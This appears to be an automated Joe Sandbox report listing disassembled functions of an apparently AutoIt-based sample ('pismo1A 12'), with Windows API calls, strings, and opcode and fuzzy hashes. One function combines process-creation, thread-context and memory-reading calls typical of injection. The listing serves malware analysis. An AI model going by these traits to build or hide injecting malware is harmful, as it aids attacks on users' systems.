Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 1c432edd710b0f2d9d9bcafd3ec7cd57efe1b85ce371d8f5b97075b912be2b90
Instruction ID: 9b5f7a083b9bd50672060e66d40e5abff8ea175c1203df0863d36d5a9a82061e
Opcode Fuzzy Hash: 1c432edd710b0f2d9d9bcafd3ec7cd57efe1b85ce371d8f5b97075b912be2b90
Instruction Fuzzy Hash: 98E0863228121477E2311759BC0DFCB3A5CD78AB72F118210F719750D046A4550153AC

Function 006B1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006B17F6

Strings

CALL, xrefs: 006B17C6

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 4e273ce8cf6679f85b18dd294d143890896a2ad4dcf24d36e2d806237505408b
Instruction ID: b4f7e80ea84b8635843233bf0c195c7d7590c476f1b666ef219c0f04b5ff9fbc
Opcode Fuzzy Hash: 4e273ce8cf6679f85b18dd294d143890896a2ad4dcf24d36e2d806237505408b
Instruction Fuzzy Hash: F922AEB1608201EFC714DF14C490AAABBF2BF86314F64896DF5968B362D735ED81CB52

Function 00716EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00716F6B

Part of subcall function 006A4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00716F5A, 00716F63

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: a6576d959bf89d0415202881dbaa03195e234f825fc1a6b9ae4a163336989b3c
Instruction ID: df10714a5263a0d97a7ff6e92172deccebbd721d21b917707167b6ebe76f1566
Opcode Fuzzy Hash: a6576d959bf89d0415202881dbaa03195e234f825fc1a6b9ae4a163336989b3c
Instruction Fuzzy Hash: 5FB17D315082018FCB58FF24C8919AEB7F6AF95310F14891DF496972A2DB34ED89CF96

Function 00712557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00712587

Strings

EA06, xrefs: 007125B9

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: d4dc3b82fa4be43cee1e45ec7232a04a3185c07b3f2e6b28c686be81efd06285
Instruction ID: d208e360e07912da88df8580103ee31b524abcfbfe7ef262f3fa0354d2dfa984
Opcode Fuzzy Hash: d4dc3b82fa4be43cee1e45ec7232a04a3185c07b3f2e6b28c686be81efd06285
Instruction Fuzzy Hash: 5D01F5729042587EDF28C7A8C856FFEBBF8DB05301F00459EE152D21C1E4B8E7188B60

Function 006A5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006A949C,?,00008000), ref: 006A5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,006A949C,?,00008000), ref: 006E4052

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: af42a84249bed6652291c859c2155d56dad03e9bfcee57e5904d8f9c8ec18e8a
Instruction ID: 9f52038ba8e13298af631b1e8942ea0c200368cc7d2fe161acfc46deefa343ad
Opcode Fuzzy Hash: af42a84249bed6652291c859c2155d56dad03e9bfcee57e5904d8f9c8ec18e8a
Instruction Fuzzy Hash: 73019E31245325BAE3315A2ACC0EF977F99EF027B0F10C310BAAD6A1E0CBB45855DB94

Function 010C129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 010C1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010C1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010C1B13

Memory Dump Source

Source File: 00000000.00000002.2039286629.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_pismo1A 12.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: d2502d8d7707ffd27d0f552b08c58e930580ee5414fc0098c1b0920f11b9aca1
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: A112EC20A24658C6EB24DF64D8507DEB272EF68700F1090E9910DEB7A5E77A4E81CF5A

Function 006A4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E9C
Part of subcall function 006A4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006A4EAE
Part of subcall function 006A4E90: FreeLibrary.KERNEL32(00000000,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EFD

Part of subcall function 006A4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E62
Part of subcall function 006A4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006A4E74
Part of subcall function 006A4E59: FreeLibrary.KERNEL32(00000000,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E87

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: a3633ff31517f785d4025f49ba1abddba12d8126757a1e33d949b7b8ec84c137
Instruction ID: 770126a5aca4ad0f28f0243ca1181502ea7425c814dbfeee7e9169ae5294cbd6
Opcode Fuzzy Hash: a3633ff31517f785d4025f49ba1abddba12d8126757a1e33d949b7b8ec84c137
Instruction Fuzzy Hash: E1110432600305AADB10FB60DC06FADB7A6AFC1B10F20842DF452A61C2DEB5AE059B59

Function 006D8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 006D8440

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7cef15def9c8cb45dfc325f41eb7adcbf1b365d5c43efedf99b20af142fe8a22
Instruction ID: ec573ec7964a4d28643ae53bb98ae23aadb3ca21970d7c3cb992a55f731d61af
Opcode Fuzzy Hash: 7cef15def9c8cb45dfc325f41eb7adcbf1b365d5c43efedf99b20af142fe8a22
Instruction Fuzzy Hash: B111187590420AAFCB15DF58E945ADA7BF5EF48314F10405AF808AB312DB31EA11CBA5

Function 006A9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,006A543F,?,00010000,00000000,00000000,00000000,00000000), ref: 006A9A9C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9a0cbc445a2c826e7be837a46633a8462f35b78bfdef7add12cc90ade8be86c0
Instruction ID: 909a2f3b3ba5f4321dfa398649b602974c20dbd143356014c81290d430bd431d
Opcode Fuzzy Hash: 9a0cbc445a2c826e7be837a46633a8462f35b78bfdef7add12cc90ade8be86c0
Instruction Fuzzy Hash: F2114C312047059FD720DF19C880BA6B7FAEF45754F20C42EE69B86651C770AD45CF64

Function 006D5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D4C7D: RtlAllocateHeap.NTDLL(00000008,006A1129,00000000,?,006D2E29,00000001,00000364,?,?,?,006CF2DE,006D3863,00771444,?,006BFDF5,?), ref: 006D4CBE

_free.LIBCMT ref: 006D506C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: d064a847bdcd093c822a356b48993d969f7fe74715ef1677f329294ad095dda0
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: BE014972A047056BE3318F65D881A9AFBEEFB89370F25051EE185873C0EA30A805C7B4

Function 006CE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 1d0d6e5e8bf338cdf70b00f315255dad2e9e58213d69855a4b61723bab1175b8
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 9DF0D632921A109AC6312A768C05FBA33AFDF62331F10072EF421933D2DA75980286A9

Function 006A9CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 006A9CBD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
Instruction ID: 605a387947b7514e5b2e249905c0cfd8d2a00259cb8519c2ca6eda1384d8f893
Opcode Fuzzy Hash: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
Instruction Fuzzy Hash: 4DF0F4B22406006ED710AF28CC06FA6BB95EF44760F20852EF619CB2D1DB31E4508BA4

Function 006D4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,006A1129,00000000,?,006D2E29,00000001,00000364,?,?,?,006CF2DE,006D3863,00771444,?,006BFDF5,?), ref: 006D4CBE

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c25775edaf203909fa7015e0b77035ae37f2ae83a072a7b86b96fe21019a6ff1
Instruction ID: d72b99f75fd98d98c498d12f03102a573e645eb0e5350b3b5b12794dc95e4c68
Opcode Fuzzy Hash: c25775edaf203909fa7015e0b77035ae37f2ae83a072a7b86b96fe21019a6ff1
Instruction Fuzzy Hash: E6F0E931E2222467DB215F629C05FAA378BFF917A1B15811BF819AA380CF70DC0196E4

Function 006D3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e68f40b971dde04fc92a82441575004f69d55a666c8ec0364dee2609043c6258
Instruction ID: ec27d3495b65ffcf2232f122da6d9cad17e136ed14cc602f2deaf159d3f6862c
Opcode Fuzzy Hash: e68f40b971dde04fc92a82441575004f69d55a666c8ec0364dee2609043c6258
Instruction Fuzzy Hash: E5E0E53190023456E62166669C01FEA374BEF427B0F09002ABC1596780CB50DE01A3E6

Function 006A4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4F6D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e43f6bcb3c2fd8e8f5e582070ab7e4a3bfd444f29bb30ec5ac0b06a07e41bdbc
Instruction ID: 23785070fd4eb80991404af2bf6d8b2052d3a0d4fc7655819fd86023c5acd475
Opcode Fuzzy Hash: e43f6bcb3c2fd8e8f5e582070ab7e4a3bfd444f29bb30ec5ac0b06a07e41bdbc
Instruction Fuzzy Hash: 24F0A071005341CFDB34AF20D890862B7F2EF81319320D97EE1DA82610CBB19C44DF00

Function 006A2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A2DC4

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 56aaf19ecebb32f8751130aa43690b07b1018b7157e035fef66fed60bb077aeb
Instruction ID: 67de308d84036b99c53d773c00f1a3774f1846835a166cec7bfd160ebc1258c0
Opcode Fuzzy Hash: 56aaf19ecebb32f8751130aa43690b07b1018b7157e035fef66fed60bb077aeb
Instruction Fuzzy Hash: D0E0CD726002245BD711A258DC05FDA77DDDFC9790F044075FD09E7248D974AD808695

Function 00712693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 007126B5

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 35d7b423d7df0738f787acb2922224758ce08a4647e3fdd0e4e9bdf724fc639f
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 97E048B06097005FDF395A28A8517F677E5DF49300F00045EF59B82693E5726856864D

Function 006A2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006A3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006A3908

Part of subcall function 006AD730: GetInputState.USER32 ref: 006AD807

SetCurrentDirectoryW.KERNEL32(?), ref: 006A2B6B

Part of subcall function 006A30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 006A314E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: fe409c47154956a4c40195e413bb7a700dc1075e00064d648f93478349dbfe52
Instruction ID: 07d43bf1e85195aee31e7afdf4676796eaef88355f9e45519552f3848f1a9344
Opcode Fuzzy Hash: fe409c47154956a4c40195e413bb7a700dc1075e00064d648f93478349dbfe52
Instruction Fuzzy Hash: DBE0863230425407CA48BB78A8565BDA75B9FD3395F40553EF14753262CE288D454B6A

Function 006E039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,006E0704,?,?,00000000,?,006E0704,00000000,0000000C), ref: 006E03B7

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d0ee2859e23a648ec96d3df0f0b8163c23c0faa604f6abd171b2ab022f9346db
Instruction ID: 2771f3e321c2b8561938b030d69f9973a38b4610a9d1e01f1153fe57bd52778b
Opcode Fuzzy Hash: d0ee2859e23a648ec96d3df0f0b8163c23c0faa604f6abd171b2ab022f9346db
Instruction Fuzzy Hash: 42D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1866020C736E821AB94

Function 006A1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 006A1CBC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
